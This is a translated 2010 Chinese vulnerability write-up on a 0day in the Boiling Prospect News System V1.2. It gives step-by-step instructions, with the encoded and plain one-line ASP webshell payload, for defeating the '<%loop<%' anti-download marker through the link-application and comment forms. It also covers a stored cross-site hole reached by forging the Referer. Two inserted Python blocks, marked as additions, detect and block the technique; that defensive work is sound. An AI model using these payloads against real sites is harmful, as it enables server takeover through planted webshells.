Making the <%loop<% anti-download trick useless and getting a shell directly - vulnerability warning - Heiba Security Net

ID MYHACK58:62201026199
Type myhack58
Reporter Anonymous
Modified 2010-02-17T00:00:00


Title: Making the <%loop<% anti-download trick useless and getting a shell directly: an analysis of the Boiling Prospect News Multimedia System V1.2 0day. Author: Mo if you are asked [B.H.S.T] & Lee mi [L4nk0r]. Source: L4nk0r's Blog. This article was published in issue 9 (2009) of the Hacker's Handbook magazine; the author posted it on his blog afterwards. Please keep this notice when reproducing it.

L4nk0r: to make this easier for everyone to read, a file package is provided for download at the end. How this came about: over summer vacation I was home alone reading a book and browsing a website, and the whole site felt like it was built on a single system. Looking closer, it really was the Boiling Prospect News System. I remembered that early versions of this system had many holes, so I immediately went to the official site and downloaded the latest version, V1.2 Build1. Security in this version has improved a lot over earlier ones, but while reading the code I still found some weaknesses, which I share here in the form of an exploit analysis. The vulnerability itself is nothing special; pay attention to the idea.

I. Cross-site on the registration page, even planting a Trojan

Cross-site scripting via registration, and even writing a Trojan. The vulnerable files are adduser1.asp and saveuser.asp. In adduser1.asp the username field of the form is checked with a simple piece of JavaScript for illegal characters (saveuser.asp applies the same filter, so the username field cannot be used). The programmer trusted JavaScript too much, so a user can submit malicious code into the database. The code is as follows (saveuser.asp; irrelevant parts omitted):

```vbscript
sex=request.form("sex")                    ' no filtering at all here; reachable through a local (forged) submission
birthyear=request.form("birthyear")        ' same
birthmonth=request.form("birthmonth")      ' same
birthday=request.form("birthday")          ' same
depid=ChkRequest(request.form("depid"),1)  ' anti-injection: ChkRequest() is used here to prevent injection
photo=request.form("photo")                ' the following parameter, again unfiltered
```

Obviously, apart from depid, every parameter above is read directly and later written straight into the database. We know that JavaScript checks can be bypassed with a local submission, so the cross-site should be no problem at all. Yet in testing it failed. After carefully reviewing the files it includes, I understood why the programmer was so "confident". See ChkURL.asp; the code is as follows:

```vbscript
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
    ' ... a bunch of warning messages follow ...
end if
```

It uses the Referer to forbid local submissions. The old trick applies: forge the Referer. Here I captured the request with WinSock Expert, modified the data, and submitted it with NC. No further explanation here; this vulnerability can of course also be combined with the one described later.

II. The fatal wound: <%loop<% anti-download rendered useless, shell obtained directly

1. Cause analysis

Open the database /data/news3000.asp directly. By default the database is in .asp format (I doubt any webmaster changes it to .mdb), and this is the premise of everything that follows. Rename it locally to .mdb and open it, and you find a table inside, as shown in Figure 1:

![Figure 1](http://www.l4nkor.org/read.php/attachment.php?fid=60)

The NotDownload table, whose contents are displayed as "long binary data". This table is what makes our Access show the prompt in Figure 2:

![Figure 2](http://www.l4nkor.org/read.php/attachment.php?fid=61)

The "Loop" refers to the ASP loop statement: that "long binary data" in the database is in fact the string <%loop<% in hex form, 3C25206C6F6F70203C25. Open the file in UltraEdit in hex mode and search for <%, and you will find it, as shown in Figure 3:

![Figure 3](http://www.l4nkor.org/read.php/attachment.php?fid=62)

Anyone who knows ASP syntax will understand by now why the prompt in Figure 2 appears: when you insert a one-line shell, the script block cannot be closed, because <%loop<% itself is never closed. Here is the key idea: since it cannot be closed, can we comment it out? Thinking about that brings the single quotation mark to mind. Yes, that is it: the ASP comment character. The precondition is that somewhere before it we can insert <%'x, i.e.

<%'x

(here x can be some other character; it exists for the later conversion of the characters into Unicode encoding). In addition, after <%loop<% we insert %>x (x as before) so that it closes the block opened by the front insertion. That way the unclosable <%loop<% is commented out. Let us sort out the idea: at a suitable position before it, insert a piece of code that can be closed, and comment out everything that lies between the two closing delimiters. With the idea in hand, you can operate. Put another way: when you open the database in UltraEdit in hex mode and search for <%, any hit that is not the <% of loop proves a position where the front closing identifier can be inserted; the rear closing identifier can be determined the same way. With the thinking clear, let us look at the practical example.

2. Example demonstration: Boiling Prospect News System V1.2 0day

Opening the /data/news3000.asp database shows that an ordinary user can add data to the following tables:
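A defender's counterpart to the cause analysis above, as an added example that is not part of the original article: a Python script that scans the raw bytes of an Access database saved under an .asp name and reports every ASP delimiter other than the single <% loop <% marker the NotDownload table is supposed to hold, plus any script block shaped like execute/eval fed from request(...). Scanning raw bytes rather than the text Access displays is the point: the database viewer shows smuggled script as foreign glyphs, but IIS reads the file byte for byte. The LOOP_MARKER bytes follow the hex quoted above; the two database blobs are constructed samples, not dumps of news3000.asp, and the record layout is simplified to NUL-padded text.

```python
# Added example (not from the article): forensic scan of an Access database
# that is served as an .asp file. The anti-download trick relies on exactly one
# unclosable "<% loop <%" marker, so any other ASP delimiter in the raw bytes
# means a record was used to smuggle script into the file.
import re

# The marker the article describes (hex 3C25206C6F6F70203C25).
LOOP_MARKER = b"<% loop <%"

DELIM = re.compile(rb"<%|%>")
# A script block that feeds execute/eval from the request collection:
# the shape of the one-line ASP backdoor discussed in the article.
SHELL_SHAPE = re.compile(
    rb"<%(?:(?!%>).)*?\b(?:execute|eval)\b\s*\(?\s*request\b", re.I | re.S
)


def find_delimiters(blob: bytes):
    """Every <% or %> in the file, as (offset, delimiter, 24-byte context)."""
    return [(m.start(), m.group().decode("ascii"), blob[m.start():m.start() + 24])
            for m in DELIM.finditer(blob)]


def unexpected_delimiters(blob: bytes):
    """Delimiters that are not the two '<%' of the one expected LOOP_MARKER."""
    allowed = set()
    at = blob.find(LOOP_MARKER)
    if at != -1:
        allowed = {at, at + len(LOOP_MARKER) - 2}
    return [hit for hit in find_delimiters(blob) if hit[0] not in allowed]


def shell_indicators(blob: bytes):
    """Offsets of script blocks shaped like execute/eval(request(...))."""
    return [m.start() for m in SHELL_SHAPE.finditer(blob)]


def assess(blob: bytes) -> dict:
    """Summarise a scan; 'tampered' means delimiters beyond the marker exist."""
    extra = unexpected_delimiters(blob)
    return {
        "marker_present": LOOP_MARKER in blob,
        "unexpected_delimiters": len(extra),
        "shell_indicators": shell_indicators(blob),
        "tampered": bool(extra),
    }


# Constructed samples (not real database dumps): NUL-padded records with the
# marker where the NotDownload table would sit.
CLEAN_DB = b"\x00" * 8 + b"Link: example site\x00\x00" + LOOP_MARKER + b"\x00" * 8
TAMPERED_DB = (
    b"\x00" * 8
    + b'<% execute request("#")%>a<%\'x'   # front closer, stored in a record before the marker
    + b"\x00" * 4 + LOOP_MARKER + b"\x00" * 4
    + b"%>x"                                # rear closer, stored in a record after the marker
    + b"\x00" * 8
)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_DB), ("tampered", TAMPERED_DB)):
        print(name, assess(blob))
```

Run against a copy of the database file read in binary mode (`assess(open(path, "rb").read())`); a clean file reports `tampered: False`, while the tampered sample reports four stray delimiters and the offset of the execute/request block.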


1. attach table: file upload
2. FT_User table: registration (usable together with the registration cross-site of vulnerability 1)
3. Link table: link application
4. News table: publishing news
5. Review table: commenting on news
6. UploadPic table: uploading images

After exhaustive testing it turned out that the front closing identifier can be inserted through the Link table (the link application form) and the rear closing identifier through the Review table; those interested can test the other tables themselves. By default the system's link application and replies (visitors allowed) are both open. If link applications are closed, you can only go through the other tables; this is just one example, and you can draw inferences from the idea. OK, enough talk: fill in the form as in Figure 4 (here too the check is only JavaScript, and the data is inserted straight into the database):

![Figure 4](http://www.l4nkor.org/attachment.php?fid=63)

The site name

┼攠數畣整爠煥敵瑳∨∣┩愾┼砧

is the Unicode encoding produced by lake2's a2u4hack.exe tool; its prototype is:

<% execute request("#")%>a<%'x

as shown in Figure 5:

![Figure 5](http://www.l4nkor.org/attachment.php?fid=64)

Note that during the conversion no `?` may appear; that is exactly why I use an x. Then submit directly; whether or not the administrator approves it makes no difference. Open the database again in UltraEdit in hex mode and search for <%, and you find what Figure 6 shows:

![Figure 6](http://www.l4nkor.org/attachment.php?fid=65)

The first hit, shown in Figure 6, means the front closing identifier has been inserted successfully. Now open any article from the home page, click "comments" below it, choose visitor, and enter the content shown in Figure 7:

![Figure 7](http://www.l4nkor.org/attachment.php?fid=66)

Content: ┠砾, likewise encoded with the a2u4hack.exe tool; its prototype is %>x. After submitting, it goes into the database and closes the comment perfectly.
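As an added example (not code from the article or from the Boiling Prospect News System), here is the server-side check that would have stopped both halves of this technique: every field the article shows being stored unchecked (sex, birthyear, birthmonth, birthday, photo) is validated on the server instead of by the form's JavaScript or a Referer comparison, and each text value is rejected if the bytes Access would store for it contain <% or %> at any offset, which is exactly what the a2u4hack encoding produces. The SEX_CODES values, the photo path format and the sample submissions are assumptions; raw_bytes_as_served shows an analyst what IIS reads from such a value.

```python
# Added example, not from the article: server-side validation for the fields
# the article shows being written to the database unchecked. Two defensive
# points: (1) check on the server, because a form's JavaScript and a Referer
# comparison are both under the client's control; (2) check the bytes that
# will be stored, because Access keeps text as UTF-16LE while IIS reads the
# .asp-named database byte for byte.
import re
from datetime import date

ASP_DELIMS = (b"<%", b"%>")
SEX_CODES = {"0", "1"}   # hypothetical form codes; the real ones are not in the article
PHOTO_PATH = re.compile(r"[A-Za-z0-9_./-]*")  # assumed: relative path under the upload dir


def raw_bytes_as_served(value: str) -> str:
    """What the web server sees when it reads this field's UTF-16LE bytes as ANSI text."""
    return value.encode("utf-16-le").decode("latin-1")


def smuggles_asp_delimiters(value: str) -> bool:
    """True if any byte form Access may store contains <% or %> at any offset."""
    views = [value.encode("utf-16-le")]
    if all(ord(c) < 256 for c in value):
        # Jet's Unicode compression stores such text one byte per character
        views.append(value.encode("latin-1"))
    return any(d in v for v in views for d in ASP_DELIMS)


def validate_registration(form: dict) -> list:
    """Return the list of problems with a submission; empty means acceptable."""
    problems = []
    # 1. every text field: the stored byte form must never contain ASP delimiters
    for key, value in form.items():
        if smuggles_asp_delimiters(value):
            problems.append(f"{key}: would store ASP delimiters")
    # 2. enumerations and ranges, checked here rather than trusted from the form
    if form.get("sex") not in SEX_CODES:
        problems.append("sex: not an allowed code")
    try:
        y, m, d = (int(form.get(k, "")) for k in ("birthyear", "birthmonth", "birthday"))
        date(y, m, d)                      # rejects month 13, 31 February, etc.
        if not 1900 <= y <= date.today().year:
            problems.append("birthyear: out of range")
    except ValueError:
        problems.append("birth date: not a valid calendar date")
    # 3. photo: a plain relative path, no traversal
    photo = form.get("photo", "")
    if not PHOTO_PATH.fullmatch(photo) or ".." in photo:
        problems.append("photo: unexpected characters or path traversal")
    return problems


# The article's encoded link-name value, written with escapes so it survives copy/paste.
ENCODED_PAYLOAD = ("\u253c\u6520\u6578\u7563\u6574\u7220\u7165\u6575"
                   "\u7473\u2228\u2223\u2529\u613e\u253c\u7827")

# Constructed submissions (not captured traffic).
GOOD_FORM = {"sex": "1", "birthyear": "1990", "birthmonth": "7", "birthday": "15",
             "depid": "3", "photo": "upload/p1.jpg"}
BAD_FORM = dict(GOOD_FORM, birthmonth="13", photo=ENCODED_PAYLOAD)

if __name__ == "__main__":
    print(repr(raw_bytes_as_served(ENCODED_PAYLOAD)))  # the ASCII text IIS would read
    print(validate_registration(GOOD_FORM))
    print(validate_registration(BAD_FORM))
```

The byte-level check is the one that matters for this bug class: a filter that only looks at the characters `<` and `%` passes the encoded value, because the delimiters only come into existence once the UTF-16LE bytes are read as single-byte text.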


With all the work done, we see the result, as shown in Figure 8:

![Figure 8](http://www.l4nkor.org/attachment.php?fid=67)

The one-line Trojan was inserted successfully, and the link directly gives a WebShell. Of course the program has other shortcomings as well; interested friends can dig for them themselves. About this idea: when the Trojan cannot be inserted so perfectly, could we also use this method to bypass some of the upload-suffix restrictions on the data and then upload to get a webshell? Well, the idea is there; apply it flexibly. The official demo site has link submission turned off, so we did not test there; after all, this is just to give everyone an idea. The analysis ends here. This vulnerability is quite harmful, so please do not do anything illegal. Any questions can be discussed with me at the Black Hand forum or by e-mail: awolf858@gmail.com.